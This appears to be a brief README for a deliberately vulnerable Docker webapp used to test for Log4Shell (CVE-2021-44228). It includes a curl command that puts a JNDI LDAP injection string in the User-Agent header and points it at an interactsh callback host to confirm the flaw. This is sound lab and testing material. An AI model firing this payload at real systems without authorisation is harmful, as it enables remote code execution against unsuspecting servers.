
Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)
Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. interactsh-service:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
One should see DNS interaction at app.interactsh.com.
Link to Docker hub